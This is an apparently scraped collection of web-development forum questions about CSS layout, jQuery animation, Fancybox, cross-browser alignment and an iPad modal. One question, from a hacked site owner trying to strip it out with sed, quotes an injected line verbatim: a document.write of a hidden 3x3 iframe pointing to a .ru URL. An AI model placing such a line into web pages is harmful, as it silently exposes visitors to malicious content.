• Align/Wrap images around div

  What I'm trying to achieve is a page with a div centered in the middle of the screen (720x360). This is done with jQuery using $(window).height() and $(window).width() and works perfectly. The next part is getting 180x180 images to fit around that middle div. These will fill the screen + beyond. I'm stuck on how to get these to align that way and I couldn't find a live example of anyone doing the same thing. So, is this even possible? Thanks, Any help is appreciated!

  I create windows like this: var obj = document.createElement('div'); obj.className = 'window'; obj.style.width = 300 + 'px'; obj.style.height = 200 + 'px'; obj.style.left = 30 + 'px'; obj.style.top = 200 + 'px'; //and so on and what I need is to attach some data to each window. The data will be grabbed via Ajax and displayed in the windows. How should I do it so that each window hold its own unique data? I don't need to display the whole data every time and this data would need be organized before being displayed, so I can't just add it with innerHTML. I need a way to hold it somewhere else where I could easily get it and then display it with innerHTML.

• How to achieve jQuery scrolling/overlay effect (video in description)

  I have two columns. The left column contains text of dynamic lengths. The right column is of fixed height and will contain a set of images selected at random per page load. I am trying to create an effect where while the user scrolls, the Image 2 scrolls above Image 1. When it reaches the top, the Image 1 begins to scroll up until it disappears, then Image 3 comes in and repeats the process. As this is rather confusing, I made a short video describing the desired effect. Video - MP4 I have begun trying to get it working in this jsbin but am at a loss for when the user scrolls back down and also when more images are required. I am thinking my current path is not the right direction. I'm thinking that employing something like jQuery waypoints is more the direction I should be pursuing?

• CSS: Fixed background images taller than the browser viewport

  I've got a large photo (940x1210) as the background image for a #page div which wraps around all the content on a site. Since the photo is a headshot, it looks pretty silly tiled, so I've set it not to repeat, and positioned it at 0,0. When the content enclosed by #page is taller than 1210px and the background image is set to scroll, the photo scrolls out of view, but if it's fixed, only the part of the image displayed initially in the browser viewport shows up- either the top half (fixed top left) or bottom half (fixed bottom left). Here's the question: how can I fix the background image to the bottom of #page (or the body) while scrolling through the full height of the image until I get to the bottom?

  Searching for some script or service for online image resizing. I should have the ability to throw my imagelink, like http://site.com/bigimage.jpg, and it must give me this image after resizing like http://site-were-image-resized.com/sdf4234f21f.png. It would be amazing, if I can give some values, like height and width. If I upload script on my own site, it should have the ability to resize external images from some domains. • Fancybox2 Inline Content Gallery

  I am trying to create a gallery of inline content with Fancybox 2, and am failing miserably. I checked out some other resources online and they seem to indicate doing this relatively easily, yet, I cannot seem to get it to work. • Alignment issues with IE7-8

  I have major issues with cross browser compatibility. This picture illustrates the problem: What code do I put in for IE7-8 so that my menu aligns properly? Right now it looks right in firefox but nothing else. This the the menu code she had (there might be other code associated but I don't know, see actual site): .custom .menu { height:25px; border: 1px none; float:right; } I have tried things mentioned in other threads, overflow:hidden; / giving a width / margin: 0 auto etc. Nothing works and only ends up breaking Firefox as well.

• Full background using :cover; makes adds horizontal scroll

  I am working on a website which needs a header with full background image & 650 height. At the moment i am using background-size: cover; property with 100% width. While, it's working it leaves an awkward horizontal scroll of about 50px on right side. Which is lot more prominent in smaller resolutions. • youtube video will not display in desktop Chrome

  Youtube video does not show up in a modal window when viewed in a desktop version of Chrome. The modal window pops up but the youtube video does not. https://animalhealth.pfizer.com/sites/pahweb/US/EN/Products/Pages/ClarifideStories.aspx It works in IE and Firefox on Windows7, works in Chrome on Android ICS and iOS6 iPad. It is on a sharepoint site but if I open a version saved to my desktop it works fine in chrome. • How animate stacking divs in javascript/css?

  Say I have 2 divs with the same CSS class that are stacked on top of each other: div { width:100px; height: 100px; background: red; } How do I make it so that when I click a button at the top of the page, a new div is created from off the screen at the bottom and moves upwards stopping where the 2nd div is.. When the button is clicked again, a 4th div moves in from the bottom of the screen and stops where the 3rd div is... etc creating a "stacked" divs effect? I know about position:fixed and adjusting values for top, but I am not sure how to dynamically calculate where to stop the animation to achieve this effect.

• Using sed to delete string

  I was hacked and have hundreds of .js files with this line of code that I'm trying to get rid of: ;document.write('<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); It is the last line of the file, but I think the file contains windows line endings, because when ever I do this: sed -i '/sitecorporatemanagement.ru/d' * it deletes the full content of the file. • Resized XIB still full size

  Building an iPad app. I have a button on my main view that I want to launch a help window. The help window is fairly involved and has its own xib/controller. I resized the help window's XIB and saved it. I instantiated it and added it to the application controller's views as a modal. For some reason this window is still taking up the entire screen. What I really want to do is have a "view" that's maybe 70% of the width and height that lays over the normal view as a modal. How is this accomplished normally? I want it to require that they hit a button to close it. Thanks
